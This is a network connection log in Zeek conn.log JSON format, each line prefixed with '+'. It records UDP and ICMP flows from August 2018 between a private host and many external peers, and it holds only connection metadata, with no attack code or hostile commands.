+{"ts":"2018-08-03T23:38:59.307706Z","uid":"CgQcTp4niuHN3yqaT8","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"99.229.199.83","id.resp_p":11634,"proto":"udp","duration":0.000042,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"CA"} +{"ts":"2018-08-03T23:38:58.618619Z","uid":"ClGXnB44pzSjhHrys8","id.orig_h":"95.134.167.139","id.orig_p":43412,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":47,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"UA"} +{"ts":"2018-08-03T23:38:58.619137Z","uid":"CvjkKP3cKgKVd8T2t2","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"31.15.199.75","id.resp_p":26165,"proto":"udp","duration":0.000003,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"SI"} +{"ts":"2018-08-03T23:38:58.832000Z","uid":"ClR58VGpzLAJL46Rc","id.orig_h":"91.83.138.208","id.orig_p":14480,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"HU"} +{"ts":"2018-08-03T23:38:58.901337Z","uid":"CH8moo1v9VKaMTiAJi","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"173.179.56.11","id.resp_p":7650,"proto":"udp","duration":0.000006,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"CA"} +{"ts":"2018-08-03T23:38:58.959267Z","uid":"CgrFaN26cRJpsAF3Z4","id.orig_h":"192.168.0.2","id.orig_p":3,"id.resp_h":"85.245.210.143","id.resp_p":10,"proto":"icmp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":76,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"PT"} +{"ts":"2018-08-03T23:38:59.156950Z","uid":"CkebvQ2rBJhT2XQIqc","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"79.201.85.218","id.resp_p":8806,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"DE"} +{"ts":"2018-08-03T23:38:59.170983Z","uid":"CHlxms2KJ2vFurNKKc","id.orig_h":"147.143.128.90","id.orig_p":54355,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"GB"} +{"ts":"2018-08-03T23:38:59.154358Z","uid":"CbtleRmNg5GCjKHMk","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"88.192.57.32","id.resp_p":24081,"proto":"udp","duration":0.037605,"orig_bytes":129,"resp_bytes":110,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":6,"orig_ip_bytes":297,"resp_pkts":5,"resp_ip_bytes":250,"tunnel_parents":[],"resp_cc":"FI"} +{"ts":"2018-08-03T23:38:58.562102Z","uid":"CbkETK1cGRlqjHS9K9","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.16","id.resp_p":40032,"proto":"udp","duration":0.688981,"orig_bytes":44,"resp_bytes":98,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":2,"orig_ip_bytes":100,"resp_pkts":1,"resp_ip_bytes":126,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.280609Z","uid":"CWalsq4MivES2VczD5","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"71.196.139.142","id.resp_p":18396,"proto":"udp","duration":0.000075,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.282732Z","uid":"CbegQrNEOikLbz183","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"189.198.87.254","id.resp_p":44510,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"MX"} +{"ts":"2018-08-03T23:38:59.286653Z","uid":"ChnHdPf0XrA7urG","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"189.168.133.238","id.resp_p":47944,"proto":"udp","duration":0.000053,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"MX"} +{"ts":"2018-08-03T23:38:59.303505Z","uid":"COeQueOJIl2cIG9o5","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.55.56.174","id.resp_p":443,"proto":"udp","conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^d","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.306768Z","uid":"CVNdzv6yxSKbtBQSg","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"64.4.23.158","id.resp_p":443,"proto":"udp","conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^d","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.307170Z","uid":"Co1koD20ADBwJ7Yrri","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"65.55.223.46","id.resp_p":443,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:58.630305Z","uid":"CkZhIv1ofqcopulX57","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"66.56.187.33","id.resp_p":56602,"proto":"udp","duration":0.000057,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.080983Z","uid":"CfsWC64vAYFG99Wm96","id.orig_h":"180.3.222.80","id.orig_p":26256,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","duration":0.000172,"orig_bytes":104,"resp_bytes":54,"conn_state":"SF","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":4,"orig_ip_bytes":216,"resp_pkts":3,"resp_ip_bytes":138,"tunnel_parents":[],"orig_cc":"JP"} +{"ts":"2018-08-03T23:38:59.129875Z","uid":"CDIGJb3DgHkmsuep66","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"178.92.255.109","id.resp_p":51171,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"UA"} +{"ts":"2018-08-03T23:38:59.136001Z","uid":"CNtMms2l7X2tcyRG6i","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.20","id.resp_p":40033,"proto":"udp","duration":0.000039,"orig_bytes":22,"resp_bytes":98,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":50,"resp_pkts":1,"resp_ip_bytes":126,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:16.165034Z","uid":"CCxB2e4gUU7yi6zCVd","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.77.165","id.resp_p":443,"proto":"udp","duration":43.001861,"orig_bytes":0,"resp_bytes":52,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^d","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":2,"resp_ip_bytes":108,"tunnel_parents":[],"resp_cc":"HK"} +{"ts":"2018-08-03T23:38:59.154357Z","uid":"C7E4A2gav2O1Q42Ig","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"192.99.8.217","id.resp_p":53754,"proto":"udp","duration":0.127998,"orig_bytes":2367,"resp_bytes":0,"conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":52,"orig_ip_bytes":3823,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"CA"} +{"ts":"2018-08-03T23:38:59.286656Z","uid":"CtrSVf02SEbvKJ8L9","id.orig_h":"77.240.65.161","id.orig_p":63129,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"SE"} +{"ts":"2018-08-03T23:38:59.286714Z","uid":"CbRrSU37PjW0BPGeM2","id.orig_h":"190.154.57.251","id.orig_p":38270,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"EC"} +{"ts":"2018-08-03T23:38:59.306709Z","uid":"Cd0oI2202oScdez7K9","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"182.187.102.134","id.resp_p":43383,"proto":"udp","duration":0.000051,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"PK"} +{"ts":"2018-08-03T23:38:58.756064Z","uid":"CRDgH21MaL0UNjEALc","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"87.201.90.202","id.resp_p":23257,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"AE"} +{"ts":"2018-08-03T23:38:58.756092Z","uid":"Cd2TyCbhTYvdZDa3","id.orig_h":"87.69.2.66","id.orig_p":9680,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","duration":0.000003,"orig_bytes":26,"resp_bytes":18,"conn_state":"SF","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":1,"resp_ip_bytes":46,"tunnel_parents":[],"orig_cc":"IL"} +{"ts":"2018-08-03T23:38:56.129327Z","uid":"CDakiC1O3kIbEbnWI4","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.16","id.resp_p":40009,"proto":"udp","duration":2.951641,"orig_bytes":44,"resp_bytes":196,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":2,"orig_ip_bytes":100,"resp_pkts":2,"resp_ip_bytes":252,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.166856Z","uid":"Cc3chh35N8VTishGbd","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"136.152.209.104","id.resp_p":6432,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.306321Z","uid":"CfsIU448cAuQWtT7V8","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.55.130.158","id.resp_p":443,"proto":"udp","conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^d","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.306712Z","uid":"CrOVWh3buL8q0cQpsj","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"76.20.99.136","id.resp_p":6681,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.308351Z","uid":"CJBjzylC4vTHcjS68","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"113.39.79.143","id.resp_p":55876,"proto":"udp","duration":0.00004,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"JP"} +{"ts":"2018-08-03T23:38:59.280694Z","uid":"CblsCc1JclUKpFHJmj","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"80.240.41.135","id.resp_p":6142,"proto":"udp","duration":0.033632,"orig_bytes":686,"resp_bytes":572,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":30,"orig_ip_bytes":1526,"resp_pkts":26,"resp_ip_bytes":1300,"tunnel_parents":[],"resp_cc":"RU"} +{"ts":"2018-08-03T23:38:58.747778Z","uid":"CXTZWU1BJxm7MNHmWe","id.orig_h":"76.65.153.6","id.orig_p":12515,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":48,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"CA"} +{"ts":"2018-08-03T23:38:13.190459Z","uid":"CWp5UzVgWVY6wwX5k","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.74.14","id.resp_p":443,"proto":"udp","duration":45.641645,"orig_bytes":90,"resp_bytes":156,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^dD","orig_pkts":5,"orig_ip_bytes":230,"resp_pkts":6,"resp_ip_bytes":324,"tunnel_parents":[],"resp_cc":"SG"} +{"ts":"2018-08-03T23:38:59.074075Z","uid":"CJ4Luu3AgXl7Qsfkck","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"93.24.184.205","id.resp_p":49679,"proto":"udp","duration":0.000007,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"FR"} +{"ts":"2018-08-03T23:38:59.136042Z","uid":"C2IDnD0ilU997cxki","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"70.79.136.54","id.resp_p":45443,"proto":"udp","duration":0.000125,"orig_bytes":36,"resp_bytes":104,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":2,"orig_ip_bytes":92,"resp_pkts":4,"resp_ip_bytes":216,"tunnel_parents":[],"resp_cc":"CA"} +{"ts":"2018-08-03T23:38:59.156669Z","uid":"CWB6YA33AysBOuSEXk","id.orig_h":"88.91.181.121","id.orig_p":3,"id.resp_h":"192.168.0.54","id.resp_p":1,"proto":"icmp","conn_state":"OTH","local_orig":false,"local_resp":true,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":80,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"NO"} +{"ts":"2018-08-03T23:38:59.179224Z","uid":"CbaHlg40h8gtt5xi64","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"67.241.151.186","id.resp_p":37791,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:48.773124Z","uid":"CjE3zP1KsZ3926Mcm4","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.28","id.resp_p":40004,"proto":"udp","duration":10.506297,"orig_bytes":40,"resp_bytes":40,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":68,"resp_pkts":2,"resp_ip_bytes":96,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:14.306530Z","uid":"C6bNQy2jLZVkmhIf9j","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.74.26","id.resp_p":443,"proto":"udp","duration":44.974113,"orig_bytes":72,"resp_bytes":78,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":4,"orig_ip_bytes":184,"resp_pkts":3,"resp_ip_bytes":162,"tunnel_parents":[],"resp_cc":"SG"} +{"ts":"2018-08-03T23:38:59.285556Z","uid":"CTW9MD48qa6sVHIr51","id.orig_h":"114.76.200.232","id.orig_p":46397,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"AU"} +{"ts":"2018-08-03T23:38:59.285619Z","uid":"CmeE3q4nT2o7ne7Xqk","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"185.16.122.151","id.resp_p":40678,"proto":"udp","duration":0.000011,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"ES"} +{"ts":"2018-08-03T23:38:59.288099Z","uid":"Cn9JDdf4rRdnNnb4b","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"134.170.71.18","id.resp_p":50002,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":50,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.289051Z","uid":"C5tjYB4Kmw1Z38Oka5","id.orig_h":"192.168.0.2","id.orig_p":3,"id.resp_h":"105.108.79.77","id.resp_p":10,"proto":"icmp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":75,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"DZ"} +{"ts":"2018-08-03T23:38:59.288887Z","uid":"CcMf2s4AIhNlUcxeT5","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"134.170.71.18","id.resp_p":50005,"proto":"udp","duration":0.004387,"orig_bytes":88,"resp_bytes":92,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":4,"orig_ip_bytes":200,"resp_pkts":4,"resp_ip_bytes":204,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.303447Z","uid":"C3uVKz4ZsmZ5x9Jup5","id.orig_h":"97.92.94.29","id.orig_p":51316,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"US"} +{"ts":"2018-08-03T23:38:59.303456Z","uid":"CE1Ph63u9SOXECr7d3","id.orig_h":"137.186.51.103","id.orig_p":64736,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"CA"} +{"ts":"2018-08-03T23:38:18.572438Z","uid":"CV00Xd3ZILTul4FtW3","id.orig_h":"111.221.74.47","id.orig_p":40025,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","duration":40.735959,"orig_bytes":115,"resp_bytes":535,"conn_state":"SF","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":2,"orig_ip_bytes":171,"resp_pkts":5,"resp_ip_bytes":675,"tunnel_parents":[],"orig_cc":"SG"} +{"ts":"2018-08-03T23:38:58.488577Z","uid":"COkTEh4yrGsn3mPA31","id.orig_h":"199.126.166.186","id.orig_p":29598,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":47,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"CA"} +{"ts":"2018-08-03T23:38:58.494831Z","uid":"C7xhTz1GpPhjp1znN3","id.orig_h":"189.69.34.151","id.orig_p":1163,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"BR"} +{"ts":"2018-08-03T23:38:12.302346Z","uid":"CKbGZ54BkxcV8TseYc","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.30","id.resp_p":443,"proto":"udp","duration":46.605218,"orig_bytes":126,"resp_bytes":156,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":7,"orig_ip_bytes":322,"resp_pkts":6,"resp_ip_bytes":324,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.136001Z","uid":"C8F7I33TEvyJXH2eAl","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.74.44","id.resp_p":40002,"proto":"udp","duration":0.000072,"orig_bytes":22,"resp_bytes":98,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":50,"resp_pkts":1,"resp_ip_bytes":126,"tunnel_parents":[],"resp_cc":"SG"} +{"ts":"2018-08-03T23:38:13.098178Z","uid":"CH6u0g2I269weqhFyg","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.12","id.resp_p":443,"proto":"udp","duration":46.037898,"orig_bytes":90,"resp_bytes":78,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":5,"orig_ip_bytes":230,"resp_pkts":3,"resp_ip_bytes":162,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.179393Z","uid":"CGEsox4ZyZKaKF0uQ7","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"173.55.191.246","id.resp_p":62588,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.285969Z","uid":"Co3cNY25VpUdTG5poi","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"71.112.181.141","id.resp_p":35791,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.285972Z","uid":"CEFHuN3KEJFm0SzbJ4","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"186.71.43.29","id.resp_p":39415,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"EC"} +{"ts":"2018-08-03T23:38:59.286659Z","uid":"C6cZ2Lutz8gCKhyN6","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.55.56.167","id.resp_p":443,"proto":"udp","duration":0.000044,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:14.355720Z","uid":"CfDSBf2XAQFaaisWph","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.74.22","id.resp_p":443,"proto":"udp","duration":44.931024,"orig_bytes":108,"resp_bytes":130,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":6,"orig_ip_bytes":276,"resp_pkts":5,"resp_ip_bytes":270,"tunnel_parents":[],"resp_cc":"SG"} +{"ts":"2018-08-03T23:38:59.306319Z","uid":"CgGPYn40V40NxHyU4g","id.orig_h":"173.206.67.102","id.orig_p":3593,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"CA"} +{"ts":"2018-08-03T23:38:59.306715Z","uid":"CkX1qY1JCSgLSGQa9g","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"186.4.210.76","id.resp_p":38278,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"EC"} +{"ts":"2018-08-03T23:38:59.307159Z","uid":"CNml682HsL3uLHkzE6","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"59.89.209.47","id.resp_p":16648,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"IN"} +{"ts":"2018-08-03T23:38:59.280598Z","uid":"Crdzcd13mCAxO87J7k","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"162.253.130.90","id.resp_p":51551,"proto":"udp","duration":0.027987,"orig_bytes":2184,"resp_bytes":0,"conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":78,"orig_ip_bytes":4368,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"CA"} +{"ts":"2018-08-03T23:38:59.313823Z","uid":"COV6Jo3AAaVIbVRH5j","id.orig_h":"90.226.176.218","id.orig_p":30781,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","duration":0.000461,"orig_bytes":22,"resp_bytes":22,"conn_state":"SF","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":50,"resp_pkts":1,"resp_ip_bytes":50,"tunnel_parents":[],"orig_cc":"SE"} 